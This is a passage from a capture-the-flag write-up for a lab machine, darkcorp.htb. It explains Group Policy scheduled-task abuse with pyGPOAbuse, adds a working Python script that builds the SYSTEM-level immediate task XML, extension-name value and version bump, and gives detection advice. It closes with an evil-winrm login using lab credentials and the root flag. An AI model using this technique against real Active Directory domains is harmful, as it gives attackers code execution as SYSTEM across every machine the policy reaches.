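pyGPOAbuse only reports "Version updated" and "ScheduledTask created". What it had to write into the SecurityUpdates GPO (versionNumber 0 and no gPCMachineExtensionNames, per the GPOwned listing above) is spelled out by the added Python below, which is not pyGPOAbuse's own code: the ScheduledTasks.xml carrying an immediate task that runs as SYSTEM, the merged gPCMachineExtensionNames value that makes clients load the Scheduled Tasks extension for this GPO, and the version bump that makes them reprocess it. TASK_demo and the uid are placeholders; the CLSIDs and CSE/tool GUIDs are the standard Group Policy Preferences values.

```python
import re
import uuid
from datetime import datetime, timezone
from xml.etree import ElementTree as ET

# Added example (not pyGPOAbuse's or the page's code) showing the three things a
# GPO scheduled-task abuse has to write so that clients pick the task up:
#  1. Machine\Preferences\ScheduledTasks\ScheduledTasks.xml with an ImmediateTaskV2
#  2. gPCMachineExtensionNames listing the Scheduled Tasks CSE (otherwise the
#     client never runs that extension for this GPO)
#  3. a bumped version (gPCVersionNumber in LDAP and Version= in GPT.ini), since
#     clients only reprocess a GPO whose version changed.
# GUIDs are the standard Group Policy Preferences ones.
SCHEDTASKS_CLSID = "{CC63F200-7309-4ba0-B154-A71CD118DBCC}"
IMMEDIATE_TASK_CLSID = "{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}"
CSE_NULL = "{00000000-0000-0000-0000-000000000000}"
CSE_SCHEDULED_TASKS = "{AADCED64-746C-4633-A97C-D61349046527}"
TOOL_SCHEDULED_TASKS = "{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}"
_ENTRY_RE = re.compile(r"\[(\{[^}]+\})((?:\{[^}]+\})+)\]")
_GUID_RE = re.compile(r"\{[^}]+\}")


def immediate_task_xml(task_name, command, arguments, now=None, uid=None):
    """Build ScheduledTasks.xml containing one SYSTEM-level immediate task."""
    now = now or datetime.now(timezone.utc)
    uid = uid or "{%s}" % str(uuid.uuid4()).upper()
    root = ET.Element("ScheduledTasks", clsid=SCHEDTASKS_CLSID)
    task = ET.SubElement(root, "ImmediateTaskV2", clsid=IMMEDIATE_TASK_CLSID, name=task_name,
                         image="0", changed=now.strftime("%Y-%m-%d %H:%M:%S"), uid=uid)
    props = ET.SubElement(task, "Properties", action="C", name=task_name,
                          runAs="NT AUTHORITY\\System", logonType="S4U")
    t = ET.SubElement(props, "Task", version="1.3")
    ET.SubElement(ET.SubElement(t, "RegistrationInfo"), "Author").text = "NT AUTHORITY\\System"
    principal = ET.SubElement(ET.SubElement(t, "Principals"), "Principal", id="Author")
    ET.SubElement(principal, "UserId").text = "NT AUTHORITY\\System"
    ET.SubElement(principal, "RunLevel").text = "HighestAvailable"
    ET.SubElement(principal, "LogonType").text = "S4U"
    trigger = ET.SubElement(ET.SubElement(t, "Triggers"), "TimeTrigger")
    ET.SubElement(trigger, "StartBoundary").text = "%LocalTimeXmlEx%"   # "now" on the client
    ET.SubElement(trigger, "EndBoundary").text = "%LocalTimeXmlEx%"
    ET.SubElement(trigger, "Enabled").text = "true"
    action = ET.SubElement(ET.SubElement(t, "Actions", Context="Author"), "Exec")
    ET.SubElement(action, "Command").text = command
    ET.SubElement(action, "Arguments").text = arguments
    return '<?xml version="1.0" encoding="utf-8"?>\n' + ET.tostring(root, encoding="unicode")


def machine_extension_names(existing):
    """Merge the Scheduled Tasks CSE/tool pair into gPCMachineExtensionNames.

    Format: [{CSE-GUID}{TOOL-GUID}...] entries sorted by CSE GUID; the all-zero
    CSE entry also carries the tool GUID. Returns the new attribute value."""
    entries = {}
    for cse, tools in _ENTRY_RE.findall(existing or ""):
        entries.setdefault(cse, set()).update(_GUID_RE.findall(tools))
    entries.setdefault(CSE_NULL, set()).add(TOOL_SCHEDULED_TASKS)
    entries.setdefault(CSE_SCHEDULED_TASKS, set()).add(TOOL_SCHEDULED_TASKS)
    return "".join("[%s%s]" % (cse, "".join(sorted(entries[cse]))) for cse in sorted(entries))


def bump_machine_version(version):
    """gPCVersionNumber: low 16 bits = computer config, high 16 bits = user config."""
    user, machine = version >> 16, version & 0xFFFF
    return (user << 16) | ((machine + 1) & 0xFFFF)


def gpt_ini(version):
    """Contents of GPT.ini; Version here must equal gPCVersionNumber in LDAP."""
    return "[General]\r\nVersion=%d\r\n" % version


if __name__ == "__main__":
    print(immediate_task_xml("TASK_demo", "cmd.exe", "/c whoami > C:\\Windows\\Temp\\gpo.txt"))
    print(machine_extension_names(None))
    print(gpt_ini(bump_machine_version(0)))
```

The XML lands under \\darkcorp.htb\SysVol\darkcorp.htb\Policies\{652CAE9A-4BB7-49F2-9E52-3361F33CE786}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml and is applied at the next policy refresh. Those same three writes are what to alert on: a non-admin account writing under a GPO's Preferences folder in SYSVOL, and gPCVersionNumber or gPCMachineExtensionNames changing on a GPO (Directory Service event 5136 with object auditing enabled).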

Root.txt

└─$ proxychains -q evil-winrm -i 172.16.20.1 -u 'letmein' -p 'Password123$'
*Evil-WinRM* PS C:\Users\letmein\Documents> cat /Users/Administrator/Desktop/root.txt
8339785c8c77cd44f5eb1b9c93aeed39
